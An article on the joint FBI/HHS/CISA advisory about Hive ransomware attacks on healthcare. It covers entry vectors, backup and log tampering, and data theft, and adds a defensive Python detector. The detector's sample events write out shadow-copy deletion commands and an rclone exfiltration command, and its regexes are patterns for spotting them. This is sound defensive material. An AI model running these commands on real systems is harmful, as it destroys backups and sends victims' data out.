On November 17, 2022, the Federal Bureau of Investigation (FBI), the Department of Health and Human Services (DHSS) and the Cybersecurity and Infrastructure Security Agency (CISA) jointly issued a warning to the Healthcare and Public Health (HPH) sector about the increased risk of ransomware attacks. The warning follows a sustained campaign between June 2021 and November 2022 in which the Hive Ransomware Group attacked more than 1,300 organizations around the world. The total value of the ransoms paid during these attacks was $100 million.
The Hive Ransomware Group, which operates under a ransomware-as-a-service (RaaS) model, attacked the public healthcare system in Costa Rica as well as the US-based Lake Charles Memorial Health System, Missouri Delta Medical Center, Memorial Health System and Partnership HealthPlan of California. Beyond the financial cost to these organizations, the attacks put patient well-being at risk: operations had to be cancelled, urgent care units closed, and ambulances diverted to other hospitals.
Under the RaaS model, Hive develops and maintains the malware while affiliates carry out the actual intrusions and receive a share of any ransom paid. The attacks have involved double extortion: the stolen data is published if the victim does not pay the ransom, which exposes patients to identity theft and insurance fraud. Some victims who restored their data without paying the ransom have subsequently been attacked again.
Attacks are often launched by exploiting vulnerabilities in Remote Desktop Protocol (RDP) or by compromising Virtual Private Networks (VPNs). Victims are also targeted through phishing, or by directly exploiting unpatched server vulnerabilities (such as the Microsoft Exchange Server vulnerabilities CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523).
Once inside an organization's network, the affiliate deploying the malware identifies how backups are stored, which antivirus software is in use, how files are copied, and so on, and then interferes with those processes. Shadow copy services are stopped and all existing copies deleted; event logs are cleared (specifically the Windows System, Security and Application logs); virus definitions are removed and standard antivirus programs are disabled. Sensitive patient data is exfiltrated using Rclone, and it is this data that is then held to ransom. The affiliate chats with the victim in "real time" to explain its demands.
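As an added illustration (not part of the advisory or of this article), the following Python script shows how a defender might correlate the pre-encryption behaviours described above, shadow copy deletion, event log clearing and Rclone execution, across constructed Windows process-creation and log-clearing events. Event IDs 4688, 1102 and 104 are standard Windows ones; the command-line patterns, field names and sample records are assumptions.

```python
import re

# Constructed sample records modelled on Windows Security / Sysmon events
# (not real telemetry); field names are simplified assumptions.
SAMPLE_EVENTS = [
    {"host": "ws01", "id": 4688, "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws01", "id": 4688, "cmd": "wmic.exe shadowcopy delete"},
    {"host": "ws01", "id": 1102, "cmd": ""},   # Security log cleared
    {"host": "ws01", "id": 104,  "cmd": ""},   # System/Application log cleared
    {"host": "ws01", "id": 4688, "cmd": "C:\\Tools\\rclone.exe copy D:\\data remote:bucket"},
    {"host": "ws02", "id": 4688, "cmd": "notepad.exe C:\\notes.txt"},
]

# Each rule: (name, required event id or None, regex on command line or None).
# Patterns are assumed common shadow-copy deletion and Rclone command shapes.
RULES = [
    ("shadow_copy_deletion", 4688,
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("security_log_cleared", 1102, None),
    ("system_or_app_log_cleared", 104, None),
    ("rclone_execution", 4688, re.compile(r"(?:^|[\\/\s])rclone(?:\.exe)?\s", re.I)),
]

def match_rules(event):
    """Return the names of all rules that fire on a single event."""
    hits = []
    for name, event_id, pattern in RULES:
        if event_id is not None and event["id"] != event_id:
            continue
        if pattern is not None and not pattern.search(event.get("cmd", "")):
            continue
        hits.append(name)
    return hits

def score_hosts(events):
    """Collect the distinct precursor behaviours observed on each host."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["host"], set()).update(match_rules(ev))
    return {host: sorted(behaviours) for host, behaviours in per_host.items()}

def high_confidence_hosts(events, threshold=3):
    """Hosts showing at least `threshold` distinct behaviours: treat as
    likely pre-encryption activity and escalate for immediate response."""
    return [h for h, b in score_hosts(events).items() if len(b) >= threshold]

if __name__ == "__main__":
    for host, behaviours in score_hosts(SAMPLE_EVENTS).items():
        print(host, behaviours)
    print("escalate:", high_confidence_hosts(SAMPLE_EVENTS))
```

A single rule firing (for example an administrator legitimately clearing a log) is noise; the value is in several distinct behaviours appearing on one host in a short window.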
More detail on the attacks, together with the advice of the FBI, CISA and DHSS, can be found here. They recommend limiting the impact of an attack by verifying that Hive no longer has access to the network, keeping operating systems up to date, and implementing multi-factor authentication wherever possible.